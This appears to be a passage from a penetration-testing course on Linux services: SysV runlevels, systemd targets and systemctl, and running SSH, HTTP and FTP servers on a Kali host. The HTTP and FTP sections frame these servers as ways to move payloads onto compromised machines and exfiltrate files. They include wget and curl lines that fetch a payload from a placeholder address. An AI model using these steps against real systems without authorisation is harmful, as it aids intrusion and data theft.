To change the current runlevel, we can use the init or telinit command; the runlevel command only displays the current and previous runlevels. If we wanted to change to Runlevel 3, for instance, we would enter sudo init 3. To avoid breaking our connection with the Kali host, let's not do this now, but be aware of how it is done.
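
For reference only, such a change would look like the following. This is a sketch; do not run it on the lab host, since it would stop the graphical session.

$ sudo init 3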

Each runlevel has a respective /etc/rc#.d/ directory associated with it. This directory contains the scripts (typically symbolic links to the scripts in /etc/init.d/) for the services that will be started for that runlevel. Let's take a look at /etc/rc2.d/ on this Ubuntu host.

root@4f165cb1f679:/# ls /etc/rc2.d/
S10sysklogd  S11klogd  S20makedev  S20ssh  S99rc.local  S99rmnologin

In the listing above, 6 startup (S) scripts are shown. These are run in alphanumeric order as the system enters the Runlevel 2 state: scripts prefixed with S are run with the start argument, scripts prefixed with K (kill) are run with the stop argument to stop services that should not run in that runlevel, and the two-digit number controls the order of execution.
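
On Debian-based SysV systems, these S and K links are usually managed with the update-rc.d utility rather than created by hand. A minimal sketch, assuming the ssh script already exists in /etc/init.d/:

root@4f165cb1f679:/# update-rc.d ssh defaults
root@4f165cb1f679:/# update-rc.d -f ssh remove

The defaults argument creates the start and stop links for the standard runlevels, while remove deletes them.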

The service scripts are located in /etc/init.d/ by default on a SysV Init system. Let's take a look at what scripts are available on the Ubuntu host.

root@4f165cb1f679:/# ls /etc/init.d/
README        bootlogd     checkroot.sh       halt         keymap.sh  makedev            mountdevsubfs  networking   quota     rc.local  rmnologin  skeleton       sysklogd  umountnfs.sh  waitnfs.sh
alsa-utils    bootmisc.sh  console-screen.sh  hostname.sh  klogd      module-init-tools  mountvirtfs    pcmciautils  quotarpc  rcS       sendsigs   ssh            udev      umountroot
bootclean.sh  checkfs.sh   glibc.sh           hwclock.sh   loopback   mountall.sh        mtab           procps.sh    rc        reboot    single     stop-bootlogd  umountfs  urandom

In the listing above, ssh is included. We can work with services outside of runlevels by manually executing the scripts in the /etc/init.d/ directory. Let's start the ssh service.

root@6126fd75c46c:/# /etc/init.d/ssh start
 * Starting OpenBSD Secure Shell server...                                                                                                                                                                            [ ok ] 

The ok response indicates that the ssh service was started and is running. There are many other possible service actions. Let's execute the ssh script without a parameter to see the actions we may be able to take.

root@6126fd75c46c:/# /etc/init.d/ssh
 * Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart}

It is important to note that not all service scripts will display a Usage message when the script is executed without a valid argument. This example demonstrates that {start|stop|reload|force-reload|restart} can be appended to the script execution to take different actions with the service.

Let's shift our focus back to our Kali host to cover one last thing about SysV Init: the service command. Even though Kali does not actually use SysV Init, the service command still works because Systemd handles the request behind the scenes, and the functionality remains the same as though it were a SysV system. The syntax for the service utility is service service-name {start|stop|status}. Let's start, get the status of, and stop the ssh service on our Kali host.

$ sudo service ssh start
[sudo] password for kali: 

$ sudo service ssh status
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Thu 2021-07-22 11:02:55 MST; 1min 3s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 64702 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 64703 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 1.0M
        CPU: 17ms
     CGroup: /system.slice/ssh.service
             └─64703 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jul 22 11:02:55 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jul 22 11:02:55 kali sshd[64703]: Server listening on 0.0.0.0 port 22.
Jul 22 11:02:55 kali sshd[64703]: Server listening on :: port 22.
Jul 22 11:02:55 kali systemd[1]: Started OpenBSD Secure Shell server.

$ sudo service ssh stop

$

The listing shows that the service is running after we execute the start action. This is very similar to invoking the ssh script in the /etc/init.d/ directory shown previously. service is considered a legacy command, and SysV Init systems are becoming less common in the wild.

Systemd (systemctl)

Most Linux systems today use a service management system called Systemd, so it is important to understand how its services are managed. This section covers how to determine whether a Linux system is using Systemd, how to work with its services, why most distributions moved away from SysV Init, and the similarities between the two.

Before moving into the details of Systemd, let's figure out if Kali is using Systemd. To do this, we can look at the first process that was created on the Linux host. We can do this with the ps 1 command.

$ ps 1
    PID TTY      STAT   TIME COMMAND
      1 ?        Ss     0:05 /sbin/init splash

/sbin/init is historically a process that is used by SysV Init. Let's look at that file to see what it is. We'll use the file command to do this.

$ file /sbin/init
/sbin/init: symbolic link to /lib/systemd/systemd

In the listing above, we can determine that our Kali host is using Systemd since the /sbin/init file is a symbolic link to /lib/systemd/systemd and is the first process used to initialize the system on startup.

Systemd is controlled with a utility called systemctl. This is very similar to the service utility, but the order of the service-name and action is reversed: the syntax is systemctl {start|stop|status} service-name. Let's take ssh as an example and start it on our host with systemctl.

$ sudo systemctl start ssh
[sudo] password for kali: 

Since no error was output to our screen, we can expect that the ssh service is up and running. Several other actions can be taken with the systemctl utility as well; the most commonly used are summarized below.
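
The following is a quick reference of common systemctl actions, using ssh as the example service (enable and disable are demonstrated later in this module):

$ sudo systemctl stop ssh        # stop the running service
$ sudo systemctl restart ssh     # stop and then start the service again
$ sudo systemctl reload ssh      # re-read the configuration without a full restart
$ sudo systemctl enable ssh      # start the service automatically at boot
$ sudo systemctl disable ssh     # do not start the service automatically at boot
$ systemctl status ssh           # display the current state of the service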

Let's verify the status of the ssh service.

$ systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Thu 2021-07-22 12:52:23 MST; 1h 2min ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 65249 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
    Process: 65292 ExecReload=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
    Process: 65293 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
   Main PID: 65250 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 1.1M
        CPU: 42ms
     CGroup: /system.slice/ssh.service
             └─65250 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

$

In SysV Init, we covered the concept of the 7 runlevels. We also looked at how runlevels were handled in the /etc/rc#.d/ directories and how the scripts execute in alphanumeric order. Systemd improved upon this design with target-units. Target-units are very similar in concept to runlevels, in that they define what services run at each target, but they offer more flexibility because they are not limited to 7 classifications. Let's take a look at our Kali host's target-units with the systemctl utility. Your host may appear different from the demonstration.

$ sudo systemctl list-units --type=target --all
  UNIT                                                                                 LOAD   ACTIVE   SUB    DESCRIPTION
  basic.target                                                                         loaded active   active Basic System
  blockdev@dev-disk-by\x2duuid-7f8e9fc5\x2db150\x2d4c9f\x2db1c5\x2db7928fe02ed8.target loaded inactive dead   Block Device Preparation for /dev/disk/by-uuid/7f8e9fc5-b150-4c9f-b1c5-b7928fe02ed8
  blockdev@dev-dm\x2d1.target                                                          loaded inactive dead   Block Device Preparation for /dev/dm-1
  blockdev@dev-mapper-RedHatAugust\x2d\x2dvg\x2droot.target                            loaded inactive dead   Block Device Preparation for /dev/mapper/RedHatAugust--vg-root
  blockdev@dev-mapper-RedHatAugust\x2d\x2dvg\x2dswap_1.target                          loaded inactive dead   Block Device Preparation for /dev/mapper/RedHatAugust--vg-swap_1
  blockdev@dev-sda1.target                                                             loaded inactive dead   Block Device Preparation for /dev/sda1
  cryptsetup.target                                                                    loaded active   active Local Encrypted Volumes
  emergency.target                                                                     loaded inactive dead   Emergency Mode
  first-boot-complete.target                                                           loaded inactive dead   First Boot Complete
  getty-pre.target                                                                     loaded inactive dead   Login Prompts (Pre)
  getty.target                                                                         loaded active   active Login Prompts
  graphical.target                                                                     loaded active   active Graphical Interface
  local-fs-pre.target                                                                  loaded active   active Local File Systems (Pre)
  local-fs.target                                                                      loaded active   active Local File Systems
  multi-user.target                                                                    loaded active   active Multi-User System
  network-online.target                                                                loaded active   active Network is Online
  network-pre.target                                                                   loaded inactive dead   Network (Pre)
  network.target                                                                       loaded active   active Network
  nfs-client.target                                                                    loaded active   active NFS client services
  nss-user-lookup.target                                                               loaded inactive dead   User and Group Name Lookups
  paths.target                                                                         loaded active   active Paths
  remote-fs-pre.target                                                                 loaded active   active Remote File Systems (Pre)
  remote-fs.target                                                                     loaded active   active Remote File Systems
  rescue.target                                                                        loaded inactive dead   Rescue Mode
  shutdown.target                                                                      loaded inactive dead   Shutdown
  slices.target                                                                        loaded active   active Slices
  sockets.target                                                                       loaded active   active Sockets
  sound.target                                                                         loaded active   active Sound Card
  stunnel.target                                                                       loaded active   active TLS tunnels for network services - per-config-file target
  swap.target                                                                          loaded active   active Swap
  sysinit.target                                                                       loaded active   active System Initialization
  time-set.target                                                                      loaded inactive dead   System Time Set
  time-sync.target                                                                     loaded inactive dead   System Time Synchronized
  timers.target                                                                        loaded active   active Timers
  umount.target                                                                        loaded inactive dead   Unmount All Filesystems

LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
35 loaded units listed.
To show all installed unit files use 'systemctl list-unit-files'.

$

In the case of the listing above, there are currently 35 loaded units listed. This is much more dynamic than the limited 7 in SysV Init runlevels. There are also three categorizations for each target-unit: LOAD, ACTIVE, and SUB.

LOAD specifies if a target-unit is loaded in the Linux host. This means the system can read the unit configuration file. If it is loaded, it can be called on to change the target-unit behavior of the system. This can be used to take actions such as enabling/disabling network services on a system.

ACTIVE specifies whether a particular target-unit is currently active. This does not necessarily mean that a set of services is running under that target; it means the target-unit itself was reached if it says active.

SUB specifies the status of the services running under a target-unit. Some service types can run a single time and are not continuous. This may show as exited. If a service is continuous and running, active will be shown under this field. If the process associated with the service is not running, dead will be shown in this field.

One benefit of target-units is that more than one can be active at a time and they can be processed in parallel; they do not need to be started or stopped in a strict sequence like the scripts in the /etc/rc#.d/ directories. Another advantage is the ability to declare dependencies (conditions that must be met before a unit can start) within the unit files. Systemd will automatically start the dependencies, or exit with an error if a dependency cannot be met. The target-units and services can be found in /usr/lib/systemd/system/. Let's take a look at one of the service files in this directory.

$ cat /usr/lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
Documentation=man:sshd(8) man:sshd_config(5)
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStartPre=/usr/sbin/sshd -t
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/usr/sbin/sshd -t
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure
RestartPreventExitStatus=255
Type=notify
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755

[Install]
WantedBy=multi-user.target
Alias=sshd.service

The After line is how Systemd handles dependencies in services. A Before line could also be added if this service needed to start before another target-unit. The ExecStart line is the script execution to start the service. The WantedBy line defines which target this service should be included in. In the case of the listing example, the ssh service is included in the multi-user.target target-unit.
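
If we don't know where a unit file lives, systemctl cat will print the unit file (with its path) that Systemd is actually using for a service:

$ systemctl cat ssh
# /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
---
Output Trimmed
---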

Despite there being so many target-units, there is still a correlation between runlevels and target-units. Let's execute the following command on our Kali host to see how the target-units relate to runlevels.

$ ls -al /lib/systemd/system/runlevel*
lrwxrwxrwx 1 root root   15 Apr 12 11:21 /lib/systemd/system/runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Apr 12 11:21 /lib/systemd/system/runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Apr 12 11:21 /lib/systemd/system/runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Apr 12 11:21 /lib/systemd/system/runlevel6.target -> reboot.target
---
Output Trimmed
---

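The Systemd counterpart to the default runlevel in /etc/inittab is the default target, which can be queried with systemctl get-default (and changed with systemctl set-default, should that ever be needed):

$ systemctl get-default
graphical.target
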
There is much more to Systemd than what we covered here. We covered services and target-units, but there are other unit types such as mount, link, socket, device, and more. These are not as important to understand as the concept of services and how they relate to the legacy SysV Init system.

SSH

The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.

$ sudo systemctl start ssh
[sudo] password for kali: 

We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command to search the output for sshd.

$ sudo netstat -antp | grep sshd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 25035/sshd 
tcp6 0 0 :::22 :::* LISTEN 25035/sshd
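
On newer systems where netstat is not installed by default, the ss utility from the iproute2 package provides the same information; the output below is representative and the process details will differ on your host.

$ sudo ss -antp | grep sshd
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=25035,fd=3))
LISTEN 0      128             [::]:22            [::]:*     users:(("sshd",pid=25035,fd=4))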

If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the systemctl command as follows. The systemctl command can be used to enable and disable most services within Kali Linux.

$ sudo systemctl enable ssh
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Created symlink /etc/systemd/system/sshd.service → /lib/systemd/system/ssh.service.
Created symlink /etc/systemd/system/multi-user.target.wants/ssh.service → /lib/systemd/system/ssh.service.

Unless ssh is used very often, we advise that the ssh service is started and stopped as needed. As such, we can disable the service to prevent it from starting at boot time.

$ sudo systemctl disable ssh
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable ssh
Removed /etc/systemd/system/multi-user.target.wants/ssh.service.
Removed /etc/systemd/system/sshd.service.

Now that we know how to start the ssh service, we can utilize ssh to gain access to our host from other machines.
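
For example, from another machine on the same network, we could log into the Kali host with the ssh client. The IP address below is a placeholder for your Kali host's address.

$ ssh kali@192.168.1.50
kali@192.168.1.50's password: 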

HTTP

The HTTP service can come in handy during a penetration test, either for hosting a site, or providing a platform for downloading files to a victim machine. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP service in Kali, type the following command into a terminal.

$ sudo systemctl start apache2
[sudo] password for kali:

As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again.

$ sudo netstat -antp | grep apache
tcp6       0      0 :::80                   :::*                    LISTEN      4378/apache2        

A lighter-weight and very common way to create a temporary web server is to use Python. A temporary solution can be run on demand, so we don't have to worry about leaving unneeded ports exposed on our Kali host. Before we can demonstrate this on port 80, we'll need to stop the apache2 service. Let's do that now.

$ sudo systemctl stop apache2
[sudo] password for kali:

Now that we won't have a port conflict on port 80, let's use the Python module SimpleHTTPServer to start a web server with Python.

$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

The terminal session hangs after the execution of this command. This is due to the application currently being run. When we are finished with our web service needs, we can simply enter Ctrl + C.
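
Note that SimpleHTTPServer is a Python 2 module. On installations where the python command points to Python 3, the equivalent module is http.server:

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...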

Now that we have covered two ways to start a web server, we can use them during penetration test engagements to transfer files to a compromised host.
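
For instance, with one of the web servers above running and a payload placed in the served directory, the file could be retrieved from the compromised machine with a standard download utility. The file name and IP address below are placeholders for this sketch.

$ wget http://192.168.1.50/tool.sh
$ curl -O http://192.168.1.50/tool.sh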

FTP (pure-ftpd)

FTP is a great way to transfer files from one host to another quickly. This can be used to share files on the same network or even used to exfiltrate files from compromised machines. We covered the FTP client previously, so let's move on to creating a simple FTP server on our Kali host.

Let's quickly install the Pure-FTPd server on our Kali attack machine. If you already have an FTP server configured on your Kali system, you may skip these steps.

$ sudo apt update && sudo apt install pure-ftpd

Before any clients can connect to our FTP server, we need to create a new user for Pure-FTPd. The following Bash script will automate user creation for us:

#!/bin/bash
# Create a group and a system account that the virtual FTP user will map to.
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /usr/sbin/nologin ftpuser
# Create the virtual FTP user "offsec" (the password is prompted for) and build the user database.
sudo pure-pw useradd offsec -u ftpuser -d /ftphome
sudo pure-pw mkdb
# Enable PureDB authentication. Note: "sudo cd" does not work because cd is a shell builtin,
# so the symbolic link is created with absolute paths instead.
sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/60pdb
# Create the FTP home directory and hand ownership to the FTP account.
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

We will make the script executable, then run it and enter "lab" as the password for the offsec user when prompted:

$ chmod +x setup-ftp.sh
$ sudo ./setup-ftp.sh
Password:
Enter it again:
Restarting ftp server

Now that we have our FTP server set up, we can leverage this with the username and password we added when creating the server. As always, only run this service when you need it and stop it when you don't.
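
A quick way to verify the server works is to connect locally with the ftp client and log in as the offsec user. The following is a sketch of what a successful login might look like; the banner and responses can vary with the server configuration.

$ ftp 127.0.0.1
Connected to 127.0.0.1.
220---------- Welcome to Pure-FTPd ----------
Name (127.0.0.1:kali): offsec
331 User offsec OK. Password required
Password:
230 OK. Current directory is /
ftp> 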


Relevant Note(s): Linux Basics